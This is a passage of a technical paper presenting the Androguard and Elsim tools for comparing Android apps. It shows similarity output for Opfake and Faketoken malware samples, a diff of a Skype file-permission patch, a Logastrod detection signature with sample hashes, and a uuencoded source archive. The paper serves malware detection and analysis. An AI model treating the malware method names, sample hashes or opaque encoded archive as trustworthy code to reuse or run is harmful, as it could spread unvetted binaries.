+f7c36355c706fc9dd8954c096825e0613807e0da4bd7f3de97de0aec0be23b79
+apks/plagiarism/opfake/\
+61da462a03d8651a6088958b438b44527973601e604e3ca18cb7aa0b3952d2ac
+
+Elements:
+        IDENTICAL:     951
+        SIMILAR:       5
+        NEW:           34
+        DELETED:       23
+        SKIPPED:       0
+       --> methods: 96.516954% of similarities
+#########################################################################
+
+We can skip specific libraries common to these samples such as
+"Lorg/simpleframework/xml" and methods of small sizes. This provides us
+with an even more interesting result:
+
+#########################################################################
+d@t0t0:~/androguard$ ./androsim.py -i
+apks/plagiarism/opfake/\
+f7c36355c706fc9dd8954c096825e0613807e0da4bd7f3de97de0aec0be23b79
+apks/plagiarism/opfake/\
+61da462a03d8651a6088958b438b44527973601e604e3ca18cb7aa0b3952d2ac
+-e "Lorg/simpleframework/" -s 100 -d
+
+Elements:
+        IDENTICAL:     9
+        SIMILAR:       3
+        NEW:           14
+        DELETED:       11
+        SKIPPED:       5260
+       --> methods: 44.998713% of similarities
+
+SIMILAR methods:
+       Ltoken/bot/MainApplication; loadStartSettings
+       (Ljava/lang/String;)Ltoken/bot/StartSettings; 230
+               --> Lcom/load/wap/MainApplication; loadStartSettings
+               (Ljava/lang/String;)Lcom/load/wap/StartSettings; 190 0.375
+
+       Ltoken/bot/MainService; threadOperationRun
+       (I Ljava/lang/Object;)V 197
+               --> Lcom/load/wap/MainService; threadOperationRun
+               (I Ljava/lang/Object;)V 122 0.319999992847
+
+       Ltoken/bot/ServerResponse; ()V 133
+               --> Lcom/load/wap/ServerResponse; ()V 125 0.214285716414
+
+IDENTICAL methods:
+       Ltoken/bot/Settings; isDeleteMessage (Ljava/lang/String;
+       Ljava/lang/String;)Z 132
+               --> Lcom/load/wap/Settings; isDeleteMessage
+               (Ljava/lang/String; Ljava/lang/String;)Z 132
+
+       Ltoken/bot/UpdateActivity; setMainScreen ()V 107
+               --> Lcom/load/wap/UpdateActivity; setMainScreen ()V 107
+
+       Ltoken/bot/MainApplication; sendGetRequest (Ljava/lang/String;
+       Ljava/util/List;)V 132
+               --> Lcom/load/wap/MainApplication; sendGetRequest
+               (Ljava/lang/String; Ljava/util/List;)V 132
+
+       Ltoken/bot/MainService; onStart (Landroid/content/Intent; I)V 106
+               --> Lcom/load/wap/MainService; onStart
+               (Landroid/content/Intent; I)V 106
+
+       Ltoken/bot/MainApplication; sendPostRequest (Ljava/lang/String;
+       Ljava/util/List;)V 197
+               --> Lcom/load/wap/MainApplication; sendPostRequest
+               (Ljava/lang/String; Ljava/util/List;)V 197
+
+       Ltoken/bot/MainApplication; DownloadApk (Ljava/lang/String;
+       Ljava/lang/String;)Z 106
+               --> Lcom/load/wap/MainApplication; DownloadApk
+               (Ljava/lang/String; Ljava/lang/String;)Z 106
+
+       Ltoken/bot/Settings; isCatchMessage (Ljava/lang/String;
+       Ljava/lang/String;)Ltoken/bot/CatchResult; 165
+               --> Lcom/load/wap/Settings; isCatchMessage
+               (Ljava/lang/String; Ljava/lang/String;)
+               Lcom/load/wap/CatchResult; 165
+
+       Ltoken/bot/MainApplication; getContacts
+       (Landroid/content/Context;)Ljava/util/Vector; 230
+               --> Lcom/load/wap/MainApplication; getContacts
+               (Landroid/content/Context;)Ljava/util/Vector; 230
+
+       Ltoken/bot/MainApplication; dateFromString
+       (Ljava/lang/String;)Ljava/util/Date; 103
+               --> Lcom/load/wap/MainApplication; dateFromString
+               (Ljava/lang/String;)Ljava/util/Date; 103
+#########################################################################
+
+As we can see, the names of the methods are "exactly" the same, and the
+signatures (the bytecodes with a high probability) are the same. It can be
+really interesting to detect if your software has been ripped off by
+someone.
+
+----[ 3.2 Differences between two applications
+
+Up to this point, we have a tool which is able to recognize similar
+methods, but we would like more information about the differences between
+each method.
+
+For that we will apply the same algorithm but we will change the
+"granularity" and focus on basic blocks in order to extract differences.
+However, in this specific case, we will not use our classical signature for
+each basic block but rather a simple "string" which represents the sequence
+of instructions. So, finally, as in the previous algorithm, we will have:
+    - identical basic blocs
+    - similar basic blocs
+    - new basic blocs
+    - deleted basic blocs
+
+With the list of similar basic blocks, we can apply a standard "diff"
+algorithm between each similar basic blocks to know which instructions have
+been added or removed.
+
+The Longuest Common Subsequence (LCS) algorithm [11] can then be used to
+obtain all differences. In order to apply the LCS algorithm, we will map
+each unique instruction to a simple string:
+
+    ADD 3       -> "\00"
+    ADD 1       -> "\01"
+    MOV 3       -> "\02"
+    ADD 3       -> "\00"
+
+If we have two basic blocks, we must translate each basic block into a
+final string:
+
+ADD 3
+ADD 1
+SUB 2
+IGET           => "\x00\x01\x02\x03\x00\x04"
+ADD 3
+GOTO
+
+ADD 3
+ADD 3
+SUB 2
+IGET           => "\x00\x00\x02\x03\x05\x04"
+MUL 4
+GOTO
+
+The application of the LCS algorithm[11] between these two strings reveals
+the instructions that have been added or removed:
+
+#########################################################################
+In [5]: from elsim_dalvik.py import LCS
+In [7]: a = "\x00\x01\x02\x03\x00\x04"
+In [9]: b = "\x00\x00\x02\x03\x05\x04"
+In [10]: z = LCS(a, b)
+
+In [12]: from elsim_dalvik import getDiff
+In [13]: l_a = []
+In [14]: l_r = []
+In [15]: getDiff(z, a, b, len(a), len(b), l_a, l_r)
+In [16]: l_a
+Out[16]: [(1, '\x00'), (4, '\x05')]
+// "ADD 3" and "MUL 4" have been added in the second basic bloc
+In [17]: l_r
+Out[18]: [(1, '\x01'), (4, '\x00')]
+// ""ADD 1" and "ADD 3" have been remove in the first basic bloc
+#########################################################################
+
+Although it's also possible to use a better algorithm such as the Needleman
+algorithm [10] (used in biology for "sequence alignment" [12], or in the
+comparison of network traces [35]), the tests performed have demonstrated
+that the LCS algorithm was sufficient.
+
+Now, we have a new tool called "androdiff.py" which can be used to extract
+and observe differences between two Android applications. We have tested it
+against two versions of the Skype application to analyze the patch of a
+security vulnerability [13] (mainly due to incorrect use of file
+permissions):
+
+#########################################################################
+d@t0t0:~/androguard$ ./androsim.py -i
+elsim/examples/android/com.skype.raider_1.0.0.831.apk
+elsim/examples/android/com.skype.raider_1.0.0.983.apk -c BZ2
+
+Elements:
+        IDENTICAL:     2059
+        SIMILAR:       167
+        NEW:           27
+        DELETED:       0
+        SKIPPED:       0
+       --> methods: 98.192539% of similarities
+#########################################################################
+
+We have several methods to analyze, but only a few new methods are present,
+and two of them are particularly interesting:
+
+#########################################################################
+       Lcom/skype/ipc/SkypeKitRunner; chmod (Ljava/io/File;
+                Ljava/lang/String;)Z 61
+       Lcom/skype/ipc/SkypeKitRunner; fixPermissions ([Ljava/io/File;)V 47
+#########################################################################
+
+So we can now search in the similar methods where these new methods are
+called:
+
+#########################################################################
+d@t0t0:~/androguard$ ./androdiff.py -i
+elsim/examples/android/com.skype.raider_1.0.0.831.apk
+elsim/examples/android/com.skype.raider_1.0.0.983.apk -d
+[...]
+[ ('Lcom/skype/ipc/SkypeKitRunner;', 'run', '()V') ] <->
+[ ('Lcom/skype/ipc/SkypeKitRunner;', 'run', '()V') ]
+run-BB@0xae run-BB@0xae
+Added Elements(2)
+        0xba 3 invoke-virtual v8 , [ meth@ 5897
+        Ljava/security/MessageDigest; reset ['()', 'V'] ]
+        0xc0 4 sget-object v9 , [ field@ 1299
+        Lcom/skype/ipc/SkypeKitRunner; [B MAITSEAINE ]
+Deleted Elements(0)
+
+run-BB@0x320 run-BB@0x316
+Added Elements(1)
+        0x332 5 const/4 v8 , [ #+ 0 ] // {0}
+Deleted Elements(1)
+        0x328 5 const/4 v8 , [ #+ 3 ] // {3}
+
+run-BB@0x352 run-BB@0x348
+Added Elements(1)
+        0x364 4 const-string v5 , [ string@ 2921 'chmod 750 ' ]
+Deleted Elements(1)
+        0x35a 4 const-string v5 , [ string@ 2904 'chmod 777 ' ]
+
+run-BB@0x52c run-BB@0x522
+Added Elements(10)
+        0x59e 29 invoke-virtual v4 , [ meth@ 109
+        Landroid/content/Context; getFilesDir ['()', 'Ljava/io/File;'] ]
+        0x5a4 30 move-result-object v4
+        0x5a6 31 invoke-virtual v4 , [ meth@ 5719
+                 Ljava/io/File; getAbsolutePath ['()',
+                 'Ljava/lang/String;'] ]
+        0x5ac 32 move-result-object v4
+        0x5be 37 move-object/from16 v0 , v19
+        0x5c2 38 iget-object v0 , v0 , [ field@ 1314
+                 Lcom/skype/ipc/SkypeKitRunner;
+                 Landroid/content/Context; mContext ]
+        0x5c6 39 move-object v4 , v0
+        0x5d8 44 move-object/from16 v0 , v19
+        0x5dc 45 move-object v1 , v4
+        0x5de 46 invoke-direct v0 , v1 , [ meth@ 1923
+                 Lcom/skype/ipc/SkypeKitRunner; fixPermissions
+                 ['([Ljava/io/File;)', 'V'] ]
+Deleted Elements(0)
+[...]
+#########################################################################
+
+As you can see, some constants are changed (3 to 0, 777 to 750) to patch an
+incorrect use of file permissions (you need to take the original CFG to
+view the details (maybe in a new version we will see the results in one
+CFG)). A new method is called to fix the existing permissions of the files.
+
+----[ 3.3 Looking for a signature in applications
+
+Now, if you wish to detect if a specific method (or a class) is present in
+another application, you need to check all methods of this application with
+your method.
+
+Moreover, if we have a database of signatures, we must check if each
+signature is present in our application. For example, if your database is
+composed of 1000 signatures, and our application contains 1000 methods we
+will need to perform:
+        - 1000 * 1000 -> 1.000.000 of comparisons to know the result
+
+That's why we need another solution and we will use the second algorithm
+(2.2). In this algorithm we need a set of float values to perform the
+clustering. So, in this example, we will use different sources of
+entropies.
+
+We have already described the generic algorithm (2.2), so we only need to
+define our element in this implementation. An element (in fact a part of
+our  signature) will be composed of:
+        - a string which represents the method (or the class)
+          (in fact it is a signature obtained by the grammar (3.1))
+        - a set of entropies (float values)
+
+The most important part is the set of entropies. We have used different
+sources of entropies to have better results. An Android application
+provides an important amount of information. One of them is the API that is
+used (the Android/Java API). Another one is the exceptions because they
+define very well a method. We can also use the entropy of the signature and
+the bytecode. Maybe we have redundancy by using these entropies (due to the
+fact that the entropy of the signature is composed of both the Android/Java
+packages and the exceptions), so we need to work more on this subject but
+this problem will not produce false positives.
+
+We will also define a simple JSON file that we will use to generate our
+signature in order to extract information like the entropies and to add it
+in a database. We take the "logastrod" [14] malware and we create the
+signature after the analysis of this malware in order to find where are the
+most interesting malicious parts:
+
+#########################################################################
+d@t0t0:~/androguard$ cat signatures/logastrod.sign
+[ { "SAMPLE" :
+"apks/malwares/logastrod/ \
+f18891b20623ad35713e7f44feade51a1fd16030af55056a45cefa3f5f38e983"
+}, { "BASE" : "AndroidOS", "NAME" : "Logastrod", "SIGNATURE" :
+[ { "TYPE" :
+"METHSIM", "CN" : "Lcom/pavel/newmodule/RuleActivity;", "MN" : "onCreate",
+"D" : "(Landroid/os/Bundle;)V" }, { "TYPE" : "METHSIM", "CN" :
+"Lcom/pavel/newmodule/LicenseActivity;", "MN" : "onCreate", "D" :
+"(Landroid/os/Bundle;)V" } ], "BF" : "a && b" } ]
+#########################################################################
+
+The name of this signature is "Logastrod" and we need to recognize the two
+methods (the boolean formula) to make a positive match.
+
+By using the "androcsign.py" tool we can extract the entropies and
+signatures of the methods from the specified sample, and add it to our
+database:
+
+#########################################################################
+d@t0t0:~/androguard$ ./androcsign.py -i signatures/logastrod.sign -d
+signatures/dbandroguard
+[{u'Logastrod': [[[0, 'Qlt[...]kdd',
+4.809434597538392, 4.584117420715886, 4.538809415871831, 0.0]], u'a && b'
+]}]
+#########################################################################
+
+Now it is possible to use "androsign.py" to check a particular file or an
+entire directory by using a database of signatures.
+
+"f22affca4ea15e58d8b4d345e54a7910b03c37fa70941bbcf36659cb809f13d9" is a
+sample of this "logastrod" malware:
+
+#########################################################################
+d@t0t0:~/androguard$ ./androsign.py -i
+apks/malwares/logastrod/f22affca4ea15e58d8b4d345e54a7910b03c37fa70941bbcf36
+659cb809f13d9 -b signatures/dbandroguard -c signatures/dbconfig -v
+[SIGN:69 CLUSTERS:10
+CMP_CLUSTERS:8 ELEMENTS:31 CMP_ELEMENTS:39 -> 2139 1.823282%] [[91, 92,
+0.27931034564971924], [91, 93, 0.18803419172763824]] ----> Logastrod
+#########################################################################
+
+As you can see, we have only done "39" comparisons thanks to the
+clustering. Without this method, "2139" comparisons would have been
+required for the same result.
+
+#########################################################################
+d@t0t0:~/androguard$ ./androsign.py -d apks/malwares/logastrod/ -b
+signatures/dbandroguard -c signatures/dbconfig
+f22affca4ea15e58d8b4d345e54a7910b03c37fa70941bbcf36659cb809f13d9 : ---->
+Logastrod
+a0a42b9f1d45a0e09a8da6d9ce8e74952340a538251d0e697cfe1b16e5ac6696 : ---->
+Logastrod
+77943921c7d6bad5f2e45fa22df4c23d034021ae56f0b09ecac8efb97830e0de : ---->
+Logastrod
+fea4dd75dfc4bfe279faf0b7675c48166ecac57bc8e8436c277a6da20582892f : ---->
+Logastrod
+f18891b20623ad35713e7f44feade51a1fd16030af55056a45cefa3f5f38e983 : ---->
+Logastrod
+e45caa25f87531cff2ee2803374ac78de0757941dd1311e3411ce4cdf6d5d942 : ---->
+Logastrod
+#########################################################################
+
+We can see that on VirusTotal all these samples are not detected
+identically by few AV products:
+
+#########################################################################
+f22affca4ea15e58d8b4d345e54a7910b03c37fa70941bbcf36659cb809f13d9 :
+22/43 antivirus
+a0a42b9f1d45a0e09a8da6d9ce8e74952340a538251d0e697cfe1b16e5ac6696 :
+19/43 antivirus
+77943921c7d6bad5f2e45fa22df4c23d034021ae56f0b09ecac8efb97830e0de :
+22/43 antivirus
+fea4dd75dfc4bfe279faf0b7675c48166ecac57bc8e8436c277a6da20582892f :
+21/43 antivirus
+f18891b20623ad35713e7f44feade51a1fd16030af55056a45cefa3f5f38e983 :
+19/43 antivirus
+e45caa25f87531cff2ee2803374ac78de0757941dd1311e3411ce4cdf6d5d942 :
+21/43 antivirus
+#########################################################################
+
+We maintain an Open Source Database of Android Malware [15] where you can
+find analysis links and a few signatures for Android malware. The main
+difficulty is to create a signature because you must choose carefully which
+method/class you wish to add to the database in order to avoid as much as
+possible false positives. In other terms, don't add a method/class from a
+free/proprietary "API" or project in a malware database :)
+
+You can use this tool to check if your application has been stolen by
+someone else using a multiple file analysis. Imagine that you have created
+an uber open source && l33t algorithm and you wish to know if your
+algorithm has been ripped off and included in a proprietary software. Of
+course, it is possible to build databases of many "things", from a
+cryptographic functions database to a DNA database...
+
+--[ 4 - Conclusion
+
+The similarity is a difficult problem but it is possible to achieve an
+interesting result by using the NCD and the entropy with "normalized"
+data.
+
+So, at the end of this paper, you will find two tools. The first one is
+Androguard in the first stable 1.0 version. Androguard is a known framework
+in Python to manipulate, reverse engineer, and play with Android
+applications. The stable version we release with this paper brings a lot of
+new things (especially the stability of the similarities tools) and a few
+tips and tricks to reverse engineer Android Apps (such as dealing with
+non-ASCII names).
+
+In this framework, several tools are using the new open source software
+Elsim to search the similarities/dissimilarities in different sets of
+elements. We have described two kinds of "generic" algorithms. The first
+one can be used if you wish to find the similarities between two sets of
+elements. The second one can be used if you have a database of signatures
+and you need a quick engine to search the signatures in a set of elements.
+
+Finally we described a new algorithm of entropy ("Descriptional entropy")
+which can be used to classify and obtain more information from an element
+and two new algorithms which can help you to answer to a similarity
+"problem".
+
+But Elsim is not limited to Android applications, and the tool will be
+improved in the next months to support x86 and ARM binaries in order to
+have an open source software with such capabilities.
+
+Many thanks to the Phrack staff for the suggestions on how to improve this
+work.
+
+"Talk is cheap. Show me the code". Torvalds, Linus"
+
+--[ 5 - References
+
+[1] Androguard. http://code.google.com/p/androguard/
+[2] Silvio Cesare (2010). "Classification of malware using structured
+    control flow".
+[3] MacQueen, J. B. (1967). "Some Methods for classification and Analysis
+    of Multivariate Observations".
+[4] Android source code (dalvik). http://source.android.com/
+[5] Foncy Android Malware.
+http://code.google.com/p/androguard/wiki/DatabaseAndroidMalwares#foncy
+[6] Opfake Android Malware.
+http://code.google.com/p/androguard/wiki/DatabaseAndroidMalwares#opfake_\
+(all)
+[7] Faketoken Android Malware.
+http://code.google.com/p/androguard/wiki/DatabaseAndroidMalwares#faketoken
+[8] https://www.virustotal.com/file/\
+f7c36355c706fc9dd8954c096825e0613807e0da4bd7f3de97de0aec0be23b79/analysis/
+[9] https://www.virustotal.com/file/\
+61da462a03d8651a6088958b438b44527973601e604e3ca18cb7aa0b3952d2ac/analysis/
+[10] Needleman, Saul B and Wunsch, Christian D. (1970). "A general method
+     applicable to the search for similarities in the amino acid sequence
+     of two proteins"
+[11] L. Bergroth and H. Hakonen and T. Raita (2000). "A Survey of Longest
+     Common Subsequence Algorithms".
+[12] Sequence Alignement. http://en.wikipedia.org/wiki/Sequence_alignment
+[13] Android Police. http://www.androidpolice.com/2011/04/14/\
+     exclusive-vulnerability-in-skype-for-android-is-exposing-your-name\
+     -phone-number-chat-logs-and-a-lot-more/.
+[14] Logastrod Android Malware.
+http://code.google.com/p/androguard/wiki/DatabaseAndroidMalwares#Logastrod
+[15] Opensource Database of Android Malware.
+http://code.google.com/p/androguard/wiki/DatabaseAndroidMalwares
+[16] Manuel Cebrian, Manuel Alfonseca and Alfonso Ortega. "Common Pitfalls
+     Using Normalized Compression Distance: What to Watch Out for in a
+     Compressor"
+[17] R. Cilibrasi and P. M. B. Vitanyi. "Clustering by compression"
+[18] Kolmogorov A. N (1965). "Three Approaches for Defining the Concept
+     of Information Quantity"
+[19] Snappy compressor. http://code.google.com/p/snappy/
+[20] Cilibrasi, R. & Vitanyi, P. (2005). "Clustering by compression"
+[21] Dullien, T. & Rolles, R. (2005). "Graph-based comparison of
+     executable objects"
+[22] M. Li and P. Vitanyi (1997). "An introduction to Kolmogorov
+     Complexity and Its Applications"
+[23] D. Sankoff and J. Kruskal (1983, 1989).
+     "Time warps, string edits and macromolecules"
+[24] J. Shallit, M.-W.  Wang. "Automatic Complexity of Strings".
+[25] T. Sabin. "Comparing binaries with graph isomorphisms".
+    http://razor.bindview.com/publish/papers/comparingbinaries.html
+[26] Wikipedia: http://en.wikipedia.org/wiki/Kolmogorov_complexity
+[27] Jesus Freke. http://code.google.com/p/smali/
+[28] http://en.wikipedia.org/wiki/Cluster_analysis
+[29] A. D. Danaksok and F. G. Gologlu, On Lempel-Ziv. "Complexity of
+     Sequences"
+[30] Lempel, A., Ziv, J. "On the complexity of finite sequences"
+[31] S. Janson, S. Lonardi and W. Szpankowski. "On average sequence
+     complexity"
+[32] J. Shallit. "On the maximum number of distinct factors in a
+     binary string"
+[33] http://www.c-sharpcorner.com/uploadfile/acinonyx72/calculating\
+     -the-normalized-compression-distance-between-two-strings/$
+[34] SMILES
+http://en.wikipedia.org/wiki/Simplified_molecular-input_line-entry_system
+[35] Netzob http://www.netzob.org/
+
+--[ 6 - Code
+
+begin 664 androguard-1.0.tar.gz
+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
